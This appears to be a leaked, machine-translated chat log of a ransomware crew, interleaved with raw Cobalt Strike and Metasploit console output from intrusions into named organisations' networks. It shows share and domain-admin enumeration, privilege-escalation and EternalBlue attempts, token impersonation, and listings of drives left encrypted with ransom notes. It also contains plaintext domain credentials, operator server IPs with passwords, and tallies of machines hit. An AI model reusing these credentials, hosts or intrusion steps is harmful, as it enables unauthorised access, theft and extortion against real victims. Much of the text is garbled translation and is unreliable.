\USCHI-NET002.Hobbes.loc\Drivers -
\USCHI-NET002.Hobbes.loc\E$ - Default share
\\EasySetupPayload - EasySetupPayload share for EasySetup Packages
\USCHI-NET002.Hobbes.locF
\USCHI-NET002.Hobbes.loc\F$ - Default share
\USCHI-NET002.Hobbes.loc\ImagesFiles -
\USCHI-NET002.Hobbes.loc\IPC$ - Remote IPC
\USCHI-NET002.Hobbes.loc\print$ - Printer Drivers
\USCHI-NET002.Hobbes.loc\REMINST - RemoteInstallation
\USCHI-NET002.Hobbes.loc\SCCMContentLib$ - 'Configuration Manager' Content Library for site CHI (3/6/2015)
\USCHI-NET002.Hobbes.loc\SMPSTOREF_63F684E9$ - SMS SMP Share
\USCHI-NET002.Hobbes.loc\SMSPKGF$ - SMS Site CHI DP 3/6/2015
\USCHI-NET002.Hobbes.loc\SMSSIG$ - SMS Site CHI DP 3/6/2015
\USCHI-NET002.Hobbes.loc\SMS_CHI - SMS Site CHI 09/21/20
\USCHI-NET002.Hobbes.loc\SMS_CPSC$ - SMS Compressed Package Storage
\USCHI-NET002.Hobbes.loc\SMS_DP$ - ConfigMgr Site Server DP share
\USCHI-NET002.Hobbes.loc\SMS_OCM_DATACACHE - OCM inbox directory
\USCHI-NET002.Hobbes.loc\SMS_SITE - SMS Site CHI 09/21/20
\\SITE - SMS Software Update Installation Agent -- 09/21/20
\USCHI-NET002.Hobbes.loc\SourceFiles -
\USCHI-BKP110.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-BKP110.Hobbes.loc\C$ - Default share
\USCHI-BKP110.Hobbes.loc\E$ - Default share
\USCHI-BKP110.Hobbes.loc\F$ - Default share
\USCHI-BKP110.Hobbes.loc\G$ - Default share
\USCHI-BKP110.Hobbes.loc\IPC$ - Remote IPC
\USCHI-BKP110.Hobbes.loc\VBRCatalog -
\USCHI-CAS001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-CAS001.Hobbes.loc\C$ - Default share
\USCHI-CAS001.Hobbes.loc\CertEnroll - Active Directory Certificate Services share
\USCHI-CAS001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-SBS001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-SBS001.Hobbes.loc\C$ - Default share
\USCHI-SBS001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-SBS001.Hobbes.loc/SkypeShare -
\USCHI-SBS001.Hobbes.locSkypeShare1 -
\USCHI-SBS001.Hobbes.loc/Users -
\USCHI-SBS001.Hobbes.loc\xds-replica - Share used for Skype for Business Server replication
\USCHI-SBS002.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-SBS002.Hobbes.loc\C$ - Default share
\USCHI-SBS002.Hobbes.loc\IPC$ - Remote IPC
\USCHI-EM-LT400.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-EM-LT400.Hobbes.loc\C$ - Default share
\USCHI-EM-LT400.Hobbes.loc\IPC$ - Remote IPC
\DT-000025.Hobbes.loc\A$ - Default share
\DT-000025.Hobbes.loc\ADMIN$ - Remote Admin
\\{\DT-000025.Hobbes.loc\C$ - Default share
\DT-000025.Hobbes.loc\IPC$ - Remote IPC
\DT-000025.Hobbes.loc\print$ - Printer Drivers
\USCHI-SBS003.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-SBS003.Hobbes.loc\C$ - Default share
\USCHI-SBS003.Hobbes.loc\IPC$ - Remote IPC
\USCHI-SBS003.Hobbes.loc\print$ - Printer Drivers

``````
Alias name Administrators
Comment

Members

-------------------------------------------------------------------------------
Administrator
HOBBES\AdamsK
HOBBES\Domain Admins
HOBBES\ITSUPPORT
HOBBES\IT-WKSTN-SUPP
HOBBES\PCADMIN

``confuconfuconfuconfucon@tl1''
Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
DILBERT MS-0001 RAMIREZJ
SPS19-Admin SPS-DB-2019 SPS-TS-2019
SVC-NWA001
```

```
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 PCHIDCG003 10.20.32.100
 PCHIDCG004 10.20.32.28
 USCHI-DCP001 10.20.32.175
 USCHA-DCG002 10.6.0.56
 USCHI-DCG003 10.20.32.103
 USCHI-DCG001 10.20.32.101
 PCHIDCG002 10.111.2.20
``````
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
DILBERT ePOScan Exchange Service
LaiP MITORATJ MS-0001
PCHIAPG009 PCHIAPG014 PCHIDBG001
RAMIREZJ SAVDeploy SCCMadmin
SCOMaction SLADMIN SPS19-Admin
SPS-DB-2019 SPS-TS-2019 SQL0005
SVC-CAS SVC-ESRI SVC-NWA001
SVC-PW-DBG001 SVC-PWORCHFWK SVC-PW-ORCHFWK
SVC-PWPWD001 SVC-Veeam TAGGESE
USCHIPWA001
USCHIPWD001 USCHIPWW001

``AdFindgowconf''
expFederal.com
``And also without a domain there one more session came even with lou all know the rules write logins in the personal for admin bilder shelkodavo login another session then look for vpndomain not available I have in the cob hangs another session who took off the ad info?
> getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter >
[*] 10.0.0.115 - Meterpreter session 7 closed.  Reason: Died

``failed to work from the input-though my domain is pinged from there- those sessions are not flying in the cobwebs- give me the domain-remove the ad user+ as I see it passed to myself-get that grid from the cobwebs together with @user3 nu elevate the exploit will work
and bypass yuac - no through elevate @user7 once managed to get up not Luckily, it's understandable
Tried a bunch of bypassuacs - all swear like this:
```
when the current user is not in a local admin group there is no point in trying to bypass unac+``
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
``Domain still not resolved?
http://citrixen.peptide.cn/citrix/xenapp/auth/login.aspx
```

Vin Serv 2008

All users who have creeds are on the same computer.
LA is not among them.
Domain is not responding
No WPN configs
No char
No Credits in txt or other

There is no vulnerability on MS17:
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
```
[*] Started reverse TCP handler on 173.234.155.45:9875
[*] 192.168.1.190:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] 192.168.1.190:445 - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.1.190:445 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
```

I ran it through the multihandler to the Meterpreter:
`getsystem' - bypassed

Tried a bunch of bypassuacs - all swear like this:
`Not in admins group, cannot escalate with this module
Or it goes like this:
`not-vulnerable: Target is not vulnerable`

I tried this (This module attempts to exploit existing administrative privileges to obtain a SYSTEM session)
Didn't help much either:
```
msf6 exploit(windows/local/service_permissions) > exploit

[*] Trying to add a new service...
[*] Trying to find weak permissions in existing services...
[*] [CitrixICAFileSigningService] Cannot reliably determine path: "C:\Program Files (x86)\Citrix\DeliveryServices\ICAFileSigningService\Citrix.DeliveryServices.ICASign.ServiceHost.exe"
[*] [Citrix_GTLicensingProv] Cannot reliably determine path: "C:\Program Files (x86)\Citrix\Licensing\LicWMI\Citrix_GTLicensingProv.exe"
[+] [HipsDaemon] Write access to C:\Program Files (x86)\Huorong\Sysdiag\bin\HipsDaemon.exe
[+] [knbcenter] Write access to D:\Program Files (x86)\liebao\liebao\6.5.115.18480\KNBCenter.exe
[*] [TermServLicensing] Cannot reliably determine path: C:\Windows\system32\svchost -k TSLicensing
``Mother won't appreciate it[ ](https://mediaeveryone.com/channel/general?msg=8aL7r47YQBW2B3L83) I was talking about logins, passwords, names, comments, files[ ](https://mediaeveryone.com/channel/general?msg=ugbQDs48KqS6Tt8RW) nopeYou were talking about logins, no passwords. Will there be any more?[ ](https://mediaeveryone.com/channel/general?msg=HJkjZDuH55qPtgNXX) how the fuck did I say? Take 3 sessions to 1 setcada@tl1 parsing sessions? Password change passwd``
23.106.160.50 p17464
pwd:Lukashenko228!

you have to do it every time you go in ssh/usr/bin/bash
useradd -m username --shell "shell path" && passwd username
``password set``? create a sheet of your own for now.... Are you serious... i must have tried before you write and when you specify explicitly need to write along with the useradd -m -d /home/user3 user name, it creates itself in /home when you specify the directory do not need to write the full path possible centOS or pure Deb there is no such a fuck up not understand what with vds i create usera with explicit directory specify useradd -m -d /home/user3 user3

I'm logged out in a new terminal and see this ```.
 * Ubuntu 20.04 LTS is out, raising the bar on performance, security,
   and optimisation for Intel, AMD, Nvidia, ARM64 and Z15 as well as
   AWS, Azure and Google Cloud.

     https://ubuntu.com/blog/ubuntu-20-04-lts-arrives


0 updates can be installed immediately.
0 of these updates are security updates.


$ hole
-sh: 1: holes: not found
$ ls
$


```
I specify mkhomedir_helper user3
does not work either. I check cat /etc/passwd ``
user3:x:1000:1000::/home/user3:/bin/sh

``Waiting for sessions, disassembling, working.
206.221.186.34:44482
pqtbjTVtIMYBudInFs7VVVoZDHjDvqtAR1v
``Current postpone other than @user4 so move onokayshob do not get lost can a separate channel for feedback ?on the additional modules - link + reason / descriptionNecessary to make that commands collected kerbs, out of the box worked smbauto brut, was able to download files, one command remove the addfind, one command output da, da, and other things. This is at least[ ](https://mediaeveryone.com/channel/general?msg=bDpJ3zLXSYmxHhHrY) PowerView.ps1[ ](https://mediaeveryone.com/channel/general?msg=5yjoSi3NSkCQSnsir) what kind of preview?[ ](https://mediaeveryone.com/channel/general?msg=crkwCi6fnbuPQTLDW) more specifically, links to git and other stuff that would raise the privileges[ ](https://mediaeveryone.com/channel/general?msg=dmJFPzMKqLbG5fg9C) links and stuff, what is necessary[ ](https://mediaeveryone.com/channel/general?msg=TWStQoGThWpNCeeya) mostly bugs, okay[ ](https://mediaeveryone.com/channel/general?msg=TWStQoGThWpNCeeya) ++No way to download files from the client pc, in ptn downloaded (see Download Files), but there is no download (opens a new tab - server not found.
I would like to import scripts directly from the PC to the Ptsh, rather than via a link.
Problems with sockets - comes in two or three sessions. If you work in one session, you write a command, but it is duplicated two or three times, the same number of sessions flew in...Well, the built-in toolkit could be richer...in coba it is less frequent in times, it is hardly a complaint about the tool, coba in ass conditions also often dies or does not knock) very often sessions die, which is a minus)))) there is also a button of files .... mmmvt it's blueada, i couldn't find it either until they said there's a button visiblebug[ ](https://mediaeveryone.com/channel/general?msg=7djo2SGBKa9nAjEax) about the line at the top? nothing more to say i'd like a normal panel, not a white rectangle
I would like to have a normal panel, not a white rectangle. give feedbackstatus write to the confab at once yesterday check them again? check all sisd servers + availability on what? check all the servers sisd.petya probably..who's free now? set up for msf-deploy your arma there and work together today will have to sufferOne for all is not an option. The entire subnet gets pulled into the armoue if you scan. + will be a hassle if you work at the same time in the arm still in msfnu since the time you have gained experience so you can try again)I do not remember, we originally had one for all was...and what was it that worked in turns in what? so like will conflict, if the crowd there also fell off so one for all. all who need to replace the old one in the sense of it for one? do not forget to remove inactive sessions behind you?
23.106.160.50:17464
HJ6Hmf7KNP3w2w7HCtprxRHGg6q92E9LsvWLv98y
``ShellConcatination --source=shellStarter_llvm_x64.dll -keep --target=pl64.dll --addBin=plbin `this is how you built, pyload x64 check the system bit type x86 ? how did you build and run ? if all went well the domain authorization should have diedwhy ?

beacon> ls \\admindc1\c$
[*] Tasked beacon to list files in \admindc1\c$
[+] host called home, sent: 31 bytes
[*] Listing: \admindc1\c$$

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 07/10/2020 08:19:50 $Recycle.Bin
          dir 12/08/2020 23:30:15 AdminDC1
          dir 12/08/2020 23:30:15 batch
          dir 12/08/2020 23:30:15 ck-agent
          dir 10/26/2018 09:36:07 Documents and Settings
          dir 12/08/2020 23:30:15 inetpub
          dir 12/08/2020 23:30:16 logs
          dir 12/09/2020 12:27:52:52 MSI
          dir 10/26/2018 13:40:56 PerfLogs
          dir 12/08/2020 23:30:16 Program Files
          dir 12/09/2020 02:24:43 Program Files (x86)
          dir 12/08/2020 23:30:16 ProgramData
          dir 12/08/2020 23:30:16 Recovery
          dir 12/08/2020 23:30:10 System Volume Information
          dir 10/12/2020 15:18:46 temp
          dir 12/08/2020 23:30:16 Users
          dir 12/02/2020 03:33:28 Windows
          dir 12/08/2020 23:30:16 Zabbix_Agent
 1kb fil 12/08/2020 23:30:15 AdminDC1.admin.sisd.k12_admindc1(8).req.HWOEU
 1kb fil 12/08/2020 23:30:15 admindc1.cer.HWOEU
 375kb fil 07/16/2016 07:18:08 bootmgr
 535b fil 12/08/2020 23:30:15 BOOTNXT.HWOEU
 16gb fil 11/13/2020 07:53:40 pagefile.sys
 1kb fil 12/08/2020 23:30:15 readme.txt
 40mb fil 12/09/2020 08:06:26 redcloak.msi

beacon> ls \\admindc2\c$
[*] Tasked beacon to list files in \admindc2\c$
[+] host called home, sent: 31 bytes
[-] could not open \\admindc2\c$\*: 53
beacon> ls \\\admindc3\c$
[*] Tasked beacon to list files in \admindc3\c$
[+] host called home, sent: 31 bytes
[*] Listing: \admindc3\c$$

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 07/28/2019 07:12:07 $Recycle.Bin
          dir 12/08/2020 23:32:07 ck-agent
          dir 12/09/2020 02:39:28 Config.Msi
          dir 10/26/2018 15:02:45:45 Documents and Settings
          dir 12/08/2020 23:32:08 Logs
          dir 10/29/2018 14:52:44 PerfLogs
          dir 12/08/2020 23:32:08 Program Files
          dir 12/09/2020 02:39:18 Program Files (x86)
          dir 12/08/2020 23:32:08 ProgramData
          dir 12/08/2020 23:32:08 Recovery
          dir 12/08/2020 21:50:51 System Volume Information
          dir 12/08/2020 23:32:08 Users
          dir 12/02/2020 03:45:13 Windows
          dir 12/08/2020 23:32:08 Zabbix_Agent
 375kb fil 07/16/2016 07:18:08 bootmgr
 535b fil 12/08/2020 23:32:07 BOOTNXT.HWOEU
 16gb fil 11/13/2020 16:25:59 pagefile.sys
 1kb fil 12/08/2020 23:32:07 readme.txt
 40mb fil 12/09/2020 08:06:26 redcloak.msi

beacon> ls \\\admindc4\c$
[*] Tasked beacon to list files in \admindc4\c$
[+] host called home, sent: 31 bytes
[*] Listing: \admindc4\c$$

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 07/11/2019 13:34:37 $Recycle.Bin
          dir 12/08/2020 23:32:33 ck-agent
          dir 10/29/2018 09:10:11:11 Documents and Settings
          dir 12/08/2020 23:32:35 Logs
          dir 10/29/2018 13:19:55 PerfLogs
          dir 12/08/2020 23:32:35 Program Files
          dir 12/09/2020 02:41:13 Program Files (x86)
          dir 12/08/2020 23:32:35 ProgramData
          dir 12/08/2020 23:32:35 Recovery
          dir 12/08/2020 23:32:28 System Volume Information
          dir 12/08/2020 23:32:35 Users
          dir 11/17/2020 13:36:48 Windows
          dir 12/08/2020 23:32:35 Zabbix_Agent
 375kb fil 07/16/2016 07:18:08 bootmgr
 535b fil 12/08/2020 23:32:33 BOOTNXT.HWOEU
 16gb fil 11/17/2020 13:46:41 pagefile.sys
 1kb fil 12/08/2020 23:32:33 readme.txt
 40mb fil 12/09/2020 08:06:26 redcloak.msi

beacon> ls \\\admindc5\c$
[*] Tasked beacon to list files in \admindc5\c$
[+] host called home, sent: 31 bytes
[*] Listing: \admindc5\c$$

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 07/11/2019 13:42:13 $Recycle.Bin
          dir 12/08/2020 20:24:33 $SNAP_202012020302_VOLUMEC$
          dir 12/08/2020 20:24:33 AdminDC1
          dir 12/08/2020 20:24:33 ck-agent
          dir 10/29/2018 09:48:27:27 Documents and Settings
          dir 12/08/2020 20:24:33 iboss-ad-installers-110818
          dir 12/08/2020 20:24:35 Logs
          dir 10/29/2018 14:45:30 PerfLogs
          dir 12/08/2020 20:24:35 Program Files
          dir 12/09/2020 02:48:53 Program Files (x86)
          dir 12/08/2020 20:24:35 ProgramData
          dir 12/08/2020 20:24:36 Recovery
          dir 12/08/2020 20:24:28 System Volume Information
          dir 12/08/2020 20:24:36 Users
          dir 12/02/2020 02:48:40 Windows
          dir 12/08/2020 20:25:25 Zabbix_Agent
 375kb fil 07/16/2016 07:18:08 bootmgr
 535b fil 12/08/2020 20:24:33 BOOTNXT.HWOEU
 16gb fil 11/13/2018 11:25:20 pagefile.sys
 1kb fil 12/08/2020 20:24:33 readme.txt
?ls list of dk check theirs now on azuredcdk is available?
beacon> ls \\\dhcp02\c$
[*] Tasked beacon to list files in \\dhcp02\c$
[+] host called home, sent: 29 bytes
[*] Listing: \\dhcp02\c$$

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 04/22/2016 01:52:17 $Recycle.Bin
          dir 12/08/2020 23:09:27 clu
          dir 12/08/2020 23:09:27 compaq
          dir 12/09/2020 11:37:37 Config.Msi
          dir 12/08/2020 23:09:27 cpqsystem
          dir 08/22/2013 08:48:41 Documents and Settings
          dir 12/08/2020 23:09:27 hp
          dir 08/22/2013 09:52:33 PerfLogs
          dir 12/08/2020 23:09:27 Program Files
          dir 12/09/2020 02:49:13 Program Files (x86)
          dir 12/09/2020 12:55:15 ProgramData
          dir 12/08/2020 23:09:22 System Volume Information
          dir 12/08/2020 23:09:27 Users
          dir 09/21/2020 10:12:03 Windows
          dir 12/08/2020 23:09:27 zabbix_agent
 389kb fil 09/30/2013 15:37:02 bootmgr
 535b fil 12/08/2020 23:09:27 BOOTNXT.HWOEU
 5kb fil 12/08/2020 23:09:27 cpqsprt.trace.HWOEU
 3gb fil 06/01/2020 10:32:41 pagefile.sys
 23kb fil 12/08/2020 23:09:27 PHH_wirless2.txt.HWOEU
 1kb fil 12/08/2020 23:09:27 readme.txt
 40mb fil 12/09/2020 08:06:26 redcloak.msi
 3kb fil 12/08/2020 23:09:27 smh_installer.log.HWOEU
 615b fil 12/08/2020 23:09:27 zabbix_agentd.log.HWOEU

beacon> ls \\kms\c$
[*] Tasked beacon to list files in \\kms\c$
[+] host called home, sent: 26 bytes
[*] Listing: \\kms\c$\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 09/15/2018 01:19:00 $Recycle.Bin
          dir 03/30/2020 09:58:18 Documents and Settings
          dir 05/29/2020 10:17:56 PerfLogs
          dir 12/08/2020 20:58:12 Program Files
          dir 12/08/2020 20:58:12 Program Files (x86)
          dir 12/08/2020 20:58:12 ProgramData
          dir 12/08/2020 20:58:12 Recovery
          dir 12/08/2020 20:58:07 System Volume Information
          dir 12/08/2020 20:58:12 Users
          dir 05/29/2020 10:17:57 Windows
 1gb fil 05/29/2020 10:18:36 pagefile.sys
 1kb fil 12/08/2020 20:58:12 readme.txt

beacon> ls \\\hyperv24\c$
[*] Tasked beacon to list files in \\hyperv24\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\hyperv24\c$$

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 12/08/2020 22:10:00 Avamar
          dir 11/06/2020 08:02:07 ClusterStorage
          dir 11/05/2020 16:57:08 Documents and Settings
          dir 11/06/2020 07:32:25 PerfLogs
          dir 12/08/2020 22:10:00 Program Files
          dir 12/09/2020 09:05:16 Program Files (x86)
          dir 12/08/2020 22:10:00 ProgramData
          dir 12/08/2020 22:10:00 Recovery
          dir 12/08/2020 22:09:56 System Volume Information
          dir 12/09/2020 09:04:58 Users
          dir 11/06/2020 07:55:21 Windows
          dir 12/08/2020 22:10:00 Zabbix_Agent
 839b fil 12/08/2020 22:10:00 NWT_hotfix_report.html.HWOEU
 526kb fil 12/08/2020 22:10:00 NWT_Install.log.HWOEU
 384kb fil 12/08/2020 22:10:00 NWT_Nimble_DSM_Install.log.HWOEU
 19gb fil 11/06/2020 07:57:46 pagefile.sys
 1kb fil 12/08/2020 22:10:00 readme.txt
 40mb fil 12/09/2020 08:06:26 redcloak.msi


Checked 3 everywhere is the riddimi, but check something nearby under the creed DAOK) all or those who have a jam on the current? A long time we have not been with you this format) you have about 1.5 hours to work on the current, then give access to the cobu and from there we will again sort out the work ` `.
 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 10/09/2020 09:34:10 $Recycle.Bin
          dir 07/10/2020 13:27:44 Documents and Settings
          dir 12/08/2020 23:33:21 $Packages
          dir 07/10/2020 12:14:14 PerfLogs
          dir 12/08/2020 23:33:21 Program Files
          dir 12/09/2020 08:44:13 Program Files (x86)
          dir 12/08/2020 23:33:21 ProgramData
          dir 12/08/2020 23:33:21 Recovery
          dir 12/08/2020 23:33:16 System Volume Information
          dir 12/08/2020 23:33:21 Users
          dir 07/21/2020 11:40:36 Windows
          dir 07/20/2020 14:24:04 WindowsAzure
 380kb fil 11/21/2016 00:36:43 bootmgr
 535b fil 12/08/2020 23:33:21 BOOTNXT.HWOEU
 1kb fil 12/08/2020 23:33:21 readme.txt
``ridd is[ ](https://mediaeveryone.com/channel/general?msg=yaydbDsTYtNmBckJn) and check the root of the disk Snetu I have, everything is empty, cleared recently kobuodnaa do you have many live sessions in sisd? judging by the chinese cmd far traffic flies)session by the way at slip 5 response minutes have not tried all past or not tried?other than ms17? now i will try to scan this computer for ms17>none of them is LA, no credshere? i wrote on the lpe direction that?[ ](https://mediaeveryone.com/channel/general?msg=7i8e3ue3CvTy5Mhti) in general here are all users on one computer, none of them is not LA, domain is not responding, configs no ipn, no ball, no crapspoka no question - can coba clean up sisd.net sessions?[ ](https://mediaeveryone.com/channel/general?msg=zfdbDky5Ae6mwQgxR) octe who asked for vps under the msf - in the afternoon if there are no questions, then proceed to work good afternoonHiokay)several random checked - daridmi appeared on the armies?
Servers
	Total servers on hell - 69
	Alive - 50
	Closed - 47 (no disks, ball, 3389)

Sphere - snapshots are worn out

Armies
	Total for Hell - 322
	Alive - 140
	Closed - 118
``put the final status of the last message on the armies kst appeared) 1.done.korbel.com@tl1 close here all right
what we could - done - is finished already everything) yes
I think that's it
Finish if there is anything alive and DK died network most likely by ls
Before they fell off, there was a note everywhere.
Teemo[COLODC1]daniel.harvey_adm */3192|2020Dec23 05:03:27> make_token KORBEL\ben.mandeville 1234qwerASDF!@#$
[*] Tasked beacon to create a token for KORBEL\ben.mandeville
[+] host called home, sent: 56 bytes
[+] Impersonated KORBEL\daniel.harvey_adm
Teemo[COLODC1]daniel.harvey_adm */3192|2020Dec23 05:03:34> ls \10.10.13.14\C$
[*] Tasked beacon to list files in \10.10.13.14\C$
[+] host called home, sent: 34 bytes
[-] could not open \10.10.13.14\C$\*: 53
``at the very least psek``) just in case chekdat is not available, vmik won't work eithera vmik?) that's what doesn't work) tasklist /v /s hostit depends, I thought the process just you see all drives under the tokenlse how to check?)
vmik does not work to get to the network available shard and i think you can run from dk also under the context of the LIVE domain admin then double-check the servers
where is "up" where not ) i pinged random - all are available)) want to sleep already?
beacon> shell ping -n 10.10.1.24
[*] Tasked beacon to run: ping -n 10.10.1.24
[+] host called home, sent: 49 bytes
[+] received output:
IP address must be specified.

Do a repin on the servers, for example, to see what's going on, look with DK where there are alive cars and DK alive is not
there are sessions on the servers alive or kobu blew out)or cut the traffic on the cobalt it all) they turned off the network like that)echo 1 > Z:\test.txt? and yes, recheck all servers where sessions died quickly as if not available for writing under the context
I don't get it, context access is there but for some reason the envelope is hanging so it's not writable by the way, will dir Z:\ work? will it work with a direct quote? will it fail? remap 1 and that's right :thinking:``
ls \10.10.1.181\c$
[*] Tasked beacon to list files in \10.10.1.181\c$
[+] host called home, sent: 34 bytes
[*] Listing: \\10.10.1.181\c$\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 10/20/2020 14:28:47 $Recycle.B
How was the request now? Maybe because after dk encryption the authorization broke and the token went off?
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
Unavailable Y:        \10.10.1.181\c$ Microsoft Windows Network
Unavailable Z:        \10.10.15.10\c$ Microsoft Windows Network
The command completed successfully.


beacon> ls \10.10.1.181!{\c$
[*] Tasked beacon to list files in \10.10.1.181\c$
[+] host called home, sent: 34 bytes
[*] Listing: \\10.10.1.181\c$\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 10/20/2020 14:28:47 $Recycle.Bin
          dir 10/20/2020 20:38:31 Documents and Settings
          dir 12/16/2020 12:05:24 inetpub
          dir 10/20/2020 15:46:32 PerfLogs
          dir 11/30/2020 13:30:25 Program Files
          dir 11/30/2020 13:30:26 Program Files (x86)
          dir 12/22/2020 12:41:05 ProgramData
          dir 10/20/2020 20:38:33 Recovery
          dir 11/17/2020 15:49:30 SFTP_Root
          dir 10/20/2020 14:04:21 System Volume Information
          dir 10/29/2020 16:00:15 Users
          dir 11/30/2020 13:21:42 Windows
 380kb fil 02/02/2018 10:37:03 bootmgr
 1b fil 07/16/2016 06:18:08 BOOTNXT
 2gb fil 12/21/2020 13:05:39 pagefile.sys
is the host available at all? as if under a different context they are unavailable for some reason they are hanging[ ](https://mediaeveryone.com/group/korbel-com?msg=jdyKZby3gt8qryYk9) I mean servers if suddenly so mb haven't gotten there yet?both with no noteZ / YYthere are 2 disks mapped on the host SQL only mapped disk backups saturated? checked everywhere ls C:\did you check the rdmi? drew servers, mapped arms, made dllinjelda
everything ok?? so you unloaded everything, masked it and ran it? still pranking on the anchor? well ok yeah
they're not up to date on the enrichment 4.2?
```
10.10.1.61 -
10.10.1.6 -
10.10.1.60 -
``[ ](https://mediaeveryone.com/group/korbel-com?msg=PyBQTPoGEaL2NFYJj) coban this 10.10.1.60 portscan doesn't even give out that it's alivewhen i look into cobalt access and give me the IPs of these 3 servers that are not pulling and no ports please and 445 135 139 are some open there? yes, it's kb-temperature.korbel.com
```
>operatingSystem: Windows Server 2016 Standard
``Arms.
```
10.10.32.177 - Lost = 4 (100% loss)
10.10.17.28 - Lost = 4 (100% loss)
10.10.32.161 - Lost = 4 (100% loss)
10.10.1.50 - Destination host unreachable
10.10.1.129 - Destination host unreachable
10.20.1.30 - Destination host unreachable
```

Server
```
10.10.1.60 - Destination host unreachable
``````
3 no disks, ball,3389
```
are these really wind servers? ``
Servers
	Total servers in hell - 69
	Alive - 50
	Closed - 47 ( 3 have no disks, ball, 3389)

Sphere - snapshots are worn out

Armies
	Total for Hell - 322
	Alive - 140
	Closed - 118
``All, finished```.
``Teemo[KORBELDC1]SYSTEM */464|2020Dec23 04:28:53> net share \\10.10.13.14
[*] Tasked beacon to run net share on 10.10.13.14
[+] host called home, sent: 105058 bytes
[+] received output:
Shares at \10.10.13.14:

 Share name Comment
 ---------- -------
 ADMIN$ Remote Admin
 C$ Default share
 D$ Default share
 IPC$ Remote IPC
 print$ Printer Drivers ``
``So the roadmap has actions on this``.
10.10.1.6 -
10.10.13.14 -
10.10.1.61 -
```
no servos are pulled in or mapped

```
10.10.1.65 -
10.10.32.157 -
10.10.16.58 -
10.10.1.20 -
10.20.1.24 -
10.10.17.63 -
```
and these aren't mapping@user4
```
10.10.32.153
10.10.4.100
10.10.12.156
10.10.16.238
10.10.12.52
10.10.32.172
10.10.17.54
10.10.16.51
10.10.16.19
10.10.16.39
10.10.16.15
10.10.16.190
10.10.16.165
10.10.32.178
10.10.17.48
10.10.12.156
10.10.1.94
10.10.16.41
10.10.17.47
10.10.16.37
10.10.16.172
10.10.1.135
10.10.16.2
10.10.16.34
10.10.16.43
10.10.17.41
10.10.16.197
10.10.17.38
``@user3
```
10.10.32.149
10.10.17.61
10.10.17.69
10.10.17.39
10.10.16.38
10.10.16.195
10.10.32.145
10.20.2.82
10.10.16.245
10.10.16.48
10.10.16.194
10.10.12.51
10.10.16.64
10.10.32.150
10.10.17.59
10.10.17.38
10.10.16.180
10.10.16.250
10.10.16.21
10.10.17.55
10.10.16.26
10.10.16.55
10.10.1.46
10.10.16.13
10.10.16.3
10.10.16.63
10.10.16.245
10.10.17.49
``@user7
```
10.10.16.29
10.10.16.42
10.10.1.65
10.10.16.7
10.10.17.39
10.10.17.4
10.10.16.230
10.10.12.50
10.9.32.98
10.10.16.166
10.10.32.130
10.10.16.179
10.10.4.38
10.10.32.157
10.10.17.12
10.10.17.22
10.10.16.58
10.10.1.20
10.10.16.181
10.20.1.24
10.10.1.134
10.10.16.49
10.10.17.63
10.10.17.26
10.10.32.130
10.10.12.156
10.10.16.23
10.10.17.44
``@user8
```
10.10.16.88
10.10.32.150
10.10.12.53
10.10.1.81
10.10.16.163
10.10.3.26
10.10.32.154
10.10.16.167
10.10.16.16
10.10.16.170
10.10.16.10
10.10.17.66
10.10.16.17
10.10.16.60
10.10.16.162
10.9.0.2
10.10.17.23
10.10.4.37
10.10.32.177
10.10.17.28
10.10.16.32
10.10.1.50
10.10.32.161
10.10.16.36
10.10.1.129
10.10.16.54
10.20.1.30
10.10.17.18
``Army thanks)) would be great to remove the dll? ok@user9 please also remove the dll that was thrown here by ``COGNOSPD``user4
```
10.10.1.105
10.9.1.2
10.9.1.5
10.10.1.98
10.10.1.171
10.10.1.101
10.10.1.100
10.10.1.35
10.10.4.9
10.10.1.188
``````
	 * Username : daniel.harvey_adm
	 * Domain : KORBEL
	 * Password : W3lcome?

	 * Username : adaudit
	 * Domain : korbel
	 * Password : #aud1T#

	 * Username : ben.mandeville
	 * Domain : KORBEL
	 * Password : 1234qwerASDF!@#$
``snapshots``, but that's for later, I'd add info about drop backups by the way.
45.126.210.66:22514
cJZw4bgWNBuYAeLXToHzNLYZOqnTS8CJwIe
All right)[ ](https://mediaeveryone.com/group/korbel-com?msg=LrnbrbomduXzS6viq) not yet) if it is less than 100, we pull in one do not need from you kobu what do I do?
192.198.81.122:62008
zDSFdEFyO8IHy0VfgHFByrOy5t5YgYerZRi
``))@user9 requested not there)``Stopdanova? What is that? Exactly? @tl1 can't get on the ddick
`209.222.97.50:10101````
192.168.0.46:5000
192.168.0.46:80
192.168.0.41:515
192.168.0.41:443
192.168.0.41:80
192.168.0.41:139
192.168.0.38:5000
192.168.0.23:443
192.168.0.23:80
